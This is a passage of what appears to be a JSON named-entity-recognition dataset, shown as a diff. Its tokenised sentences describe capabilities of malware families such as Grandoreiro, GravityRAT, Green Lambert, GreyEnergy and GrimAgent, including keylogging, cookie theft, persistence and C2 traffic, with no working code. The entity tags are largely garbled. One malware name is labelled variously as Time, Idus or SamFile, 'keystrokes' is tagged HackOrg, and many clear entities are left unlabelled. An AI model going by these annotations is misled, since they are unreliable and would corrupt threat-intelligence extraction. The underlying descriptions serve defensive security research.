"tokens": [ + "The", + "Grandoreiro", + "payload", + "has", + "been", + "delivered", + "encrypted", + "with", + "a", + "custom", + "XOR-based", + "algorithm", + "and", + "also", + "as", + "a", + "base64-encoded", + "ZIP", + "file." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SamFile" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "send", + "data", + "it", + "retrieves", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "delete", + ".LNK", + "files", + "created", + "in", + "the", + "Startup", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "store", + "its", + "configuration", + "in", + "the", + "Registry", + "at", + "`HKCU\\Software\\`", + "under", + "frequently", + "changing", + "names", + "including", + "<code>%USERNAME%</code>", + "and", + "<code>ToolTech-RM</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "download", + "its", + "second", + "stage", + "from", + "a", + "hardcoded", + "URL", + "within", + "the", + "loader's", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "log", + "keystrokes", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "has", + "infected", + "victims", + "via", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Grandoreiro", + "has", + "used", + "malicious", + "links", + "to", + "gain", + "execution", + "on", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "has", + "named", + "malicious", + "browser", + "extensions", + "and", + "update", + "files", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "modify", + "the", + "Registry", + "to", + "store", + "its", + "configuration", + "at", + "`HKCU\\Software\\`", + "under", + "frequently", + "changing", + "names", + "including", + "<code>%USERNAME%</code>", + "and", + "<code>ToolTech-RM</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "use", + "MSI", + "files", + "to", + "execute", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "execute", + "through", + "the", + "<code>WinExec</code>", + "API." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "identify", + "installed", + "security", + "tools", + "based", + "on", + "process", + "names." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "use", + "run", + "keys", + "and", + "create", + "link", + "files", + "in", + "the", + "startup", + "folder", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "list", + "installed", + "security", + "products", + "including", + "the", + "Trusteer", + "and", + "Diebold", + "Warsaw", + "GAS", + "Tecnologia", + "online", + "banking", + "protections." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "write", + "or", + "modify", + "browser", + "shortcuts", + "to", + "enable", + "launching", + "of", + "malicious", + "browser", + "extensions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "has", + "been", + "spread", + "via", + "malicious", + "links", + "embedded", + "in", + "e-mails." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "steal", + "the", + "victim's", + "cookies", + "to", + "use", + "for", + "duplicating", + "the", + "active", + "session", + "from", + "another", + "device." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "detect", + "VMWare", + "via", + "its", + "I/O", + "port", + "and", + "Virtual", + "PC", + "via", + "the", + "<code>vpcext</code>", + "instruction." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "collect", + "the", + "computer", + "name", + "and", + "OS", + "version", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "determine", + "the", + "IP", + "and", + "physical", + "location", + "of", + "the", + "compromised", + "host", + "via", + "IPinfo." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "collect", + "the", + "username", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "determine", + "the", + "time", + "on", + "the", + "victim", + "machine", + "via", + "IPinfo." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "use", + "VBScript", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Grandoreiro", + "can", + "modify", + "the", + "binary", + "ACL", + "to", + "prevent", + "security", + "tools", + "from", + "running." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "steals", + "files", + "with", + "the", + "following", + "extensions:", + ".docx,", + ".doc,", + ".pptx,", + ".ppt,", + ".xlsx,", + ".xls,", + ".rtf,", + "and", + ".pdf." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "GravityRAT", + "steals", + "files", + "based", + "on", + "an", + "extension", + "list", + "if", + "a", + "USB", + "drive", + "is", + "connected", + "to", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "has", + "been", + "delivered", + "via", + "Word", + "documents", + "using", + "DDE", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "supports", + "file", + "encryption", + "(AES", + "with", + "the", + "key", + "\"lolomycin2017\")." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "collects", + "the", + "volumes", + "mapped", + "on", + "the", + "system,", + "and", + "also", + "steals", + "files", + "with", + "the", + "following", + "extensions:", + ".docx,", + ".doc,", + ".pptx,", + ".ppt,", + ".xlsx,", + ".xls,", + ".rtf,", + "and", + ".pdf." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "author", + "of", + "GravityRAT", + "submitted", + "samples", + "to", + "VirusTotal", + "for", + "testing,", + "showing", + "that", + "the", + "author", + "modified", + "the", + "code", + "to", + "try", + "to", + "hide", + "the", + "DDE", + "object", + "in", + "a", + "different", + "part", + "of", + "the", + "document." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "has", + "used", + "HTTP", + "over", + "a", + "non-standard", + "port,", + "such", + "as", + "TCP", + "port", + "46769." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "lists", + "the", + "running", + "processes", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "creates", + "a", + "scheduled", + "task", + "to", + "ensure", + "it", + "is", + "re-executed", + "everyday." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "uses", + "WMI", + "to", + "check", + "the", + "BIOS", + "and", + "manufacturer", + "information", + "for", + "strings", + "like", + "\"VMWare\",", + "\"Virtual\",", + "and", + "\"XEN\"", + "and", + "another", + "WMI", + "request", + "to", + "get", + "the", + "current", + "temperature", + "of", + "the", + "hardware", + "to", + "determine", + "if", + "it's", + "a", + "virtual", + "machine", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "collects", + "the", + "MAC", + "address,", + "computer", + "name,", + "and", + "CPU", + "information." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "collects", + "the", + "victim", + "IP", + "address,", + "MAC", + "address,", + "as", + "well", + "as", + "the", + "victim", + "account", + "domain", + "name." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "uses", + "the", + "<code>netstat</code>", + "command", + "to", + "find", + "open", + "ports", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "collects", + "the", + "victim", + "username", + "along", + "with", + "other", + "account", + "information", + "(account", + "type,", + "description,", + "full", + "name,", + "SID", + "and", + "status)." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "has", + "a", + "feature", + "to", + "list", + "the", + "available", + "services", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "can", + "obtain", + "the", + "date", + "and", + "time", + "of", + "a", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "executes", + "commands", + "remotely", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GravityRAT", + "collects", + "various", + "information", + "via", + "WMI", + "requests,", + "including", + "CPU", + "information", + "in", + "the", + "Win32_Processor", + "entry", + "(Processor", + "ID,", + "Name,", + "Manufacturer", + "and", + "the", + "clock", + "speed)." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "use", + "DNS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "collect", + "data", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "use", + "multiple", + "custom", + "routines", + "to", + "decrypt", + "strings", + "prior", + "to", + "execution." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "delete", + "the", + "original", + "executable", + "after", + "initial", + "installation", + "in", + "addition", + "to", + "unused", + "functions." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "use", + "Keychain", + "Services", + "API", + "functions", + "to", + "find", + "and", + "collect", + "passwords,", + "such", + "as", + "`SecKeychainFindInternetPassword`", + "and", + "`SecKeychainItemCopyAttributesAndData`." + ], + "ner_tags": [ + "B-Tool", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Features", + "B-Purp", + "I-Features", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "create", + "a", + "Launch", + "Agent", + "with", + "the", + "`RunAtLoad`", + "key-value", + "pair", + "set", + "to", + "<code>true</code>,", + "ensuring", + "the", + "`com.apple.GrowlHelper.plist`", + "file", + "runs", + "every", + "time", + "a", + "user", + "logs", + "in." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "add", + "a", + "plist", + "file", + "in", + "the", + "`Library/LaunchDaemons`", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "add", + "Login", + "Items", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "has", + "created", + "a", + "new", + "executable", + "named", + "`Software", + "Update", + "Check`", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "has", + "been", + "disguised", + "as", + "a", + "Growl", + "help", + "file." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "has", + "encrypted", + "strings." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "use", + "proxies", + "for", + "C2", + "traffic." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "add", + "<code>init.d</code>", + "and", + "<code>rc.d</code>", + "files", + "in", + "the", + "<code>/etc</code>", + "folder", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "use", + "`uname`", + "to", + "identify", + "the", + "operating", + "system", + "name,", + "version,", + "and", + "processor", + "type." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "obtain", + "proxy", + "information", + "from", + "a", + "victim's", + "machine", + "using", + "system", + "environment", + "variables." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "collect", + "the", + "date", + "and", + "time", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "use", + "shell", + "scripts", + "for", + "execution,", + "such", + "as", + "<code>/bin/sh", + "-c</code>." + ], + "ner_tags": [ + "B-Tool", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Green", + "Lambert", + "can", + "establish", + "persistence", + "on", + "a", + "compromised", + "host", + "through", + "modifying", + "the", + "`profile`,", + "`login`,", + "and", + "run", + "command", + "(rc)", + "files", + "associated", + "with", + "the", + "`bash`,", + "`csh`,", + "and", + "`tcsh`", + "shells." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "encrypts", + "communications", + "using", + "RSA-2048." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "GreyEnergy", + "digitally", + "signs", + "the", + "malware", + "with", + "a", + "code-signing", + "certificate." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "encrypts", + "its", + "configuration", + "files", + "with", + "AES-256", + "and", + "also", + "encrypts", + "its", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "can", + "securely", + "delete", + "a", + "file", + "by", + "hooking", + "into", + "the", + "DeleteFileA", + "and", + "DeleteFileW", + "functions", + "in", + "the", + "Windows", + "API." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "can", + "download", + "additional", + "modules", + "and", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "has", + "a", + "module", + "to", + "harvest", + "pressed", + "keystrokes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "has", + "a", + "module", + "for", + "Mimikatz", + "to", + "collect", + "Windows", + "credentials", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "modifies", + "conditions", + "in", + "the", + "Registry", + "and", + "adds", + "keys." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "has", + "used", + "Tor", + "relays", + "for", + "Command", + "and", + "Control", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "has", + "a", + "module", + "to", + "inject", + "a", + "PE", + "binary", + "into", + "a", + "remote", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "uses", + "PsExec", + "locally", + "in", + "order", + "to", + "execute", + "rundll32.exe", + "at", + "the", + "highest", + "privileges", + "(NTAUTHORITY\\SYSTEM)." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "is", + "packed", + "for", + "obfuscation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "encrypts", + "communications", + "using", + "AES256." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "GreyEnergy", + "enumerates", + "all", + "Windows", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "B-Idus" + ] + }, + { + "tokens": [ + "GreyEnergy", + "uses", + "HTTP", + "and", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "uses", + "cmd.exe", + "to", + "execute", + "itself", + "in-memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GreyEnergy", + "chooses", + "a", + "service,", + "drops", + "a", + "DLL", + "file,", + "and", + "writes", + "it", + "to", + "that", + "serviceDLL", + "Registry", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "use", + "a", + "hardcoded", + "server", + "public", + "RSA", + "key", + "to", + "encrypt", + "the", + "first", + "request", + "to", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "has", + "the", + "ability", + "to", + "add", + "bytes", + "to", + "change", + "the", + "file", + "hash." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "delete", + "previously", + "created", + "tasks", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "collect", + "data", + "and", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "use", + "a", + "decryption", + "algorithm", + "for", + "strings", + "based", + "on", + "Rotate", + "on", + "Right", + "(RoR)", + "and", + "Rotate", + "on", + "Left", + "(RoL)", + "functionality." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "has", + "sent", + "data", + "related", + "to", + "a", + "compromise", + "host", + "over", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "delete", + "old", + "binaries", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "has", + "the", + "ability", + "to", + "enumerate", + "files", + "and", + "directories", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "has", + "the", + "ability", + "to", + "download", + "and", + "execute", + "additional", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "pad", + "C2", + "messages", + "with", + "random", + "generated", + "values." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "use", + "Native", + "API", + "including", + "<code>GetProcAddress</code>", + "and", + "<code>ShellExecuteW</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "has", + "used", + "Rotate", + "on", + "Right", + "(RoR)", + "and", + "Rotate", + "on", + "Left", + "(RoL)", + "functionality", + "to", + "encrypt", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "set", + "persistence", + "with", + "a", + "Registry", + "run", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "has", + "the", + "ability", + "to", + "set", + "persistence", + "using", + "the", + "Task", + "Scheduler." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "base64", + "encode", + "C2", + "replies." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GrimAgent", + "can", + "use", + "an", + "AES", + "key", + "to", + "encrypt", + "C2", + "communications." + 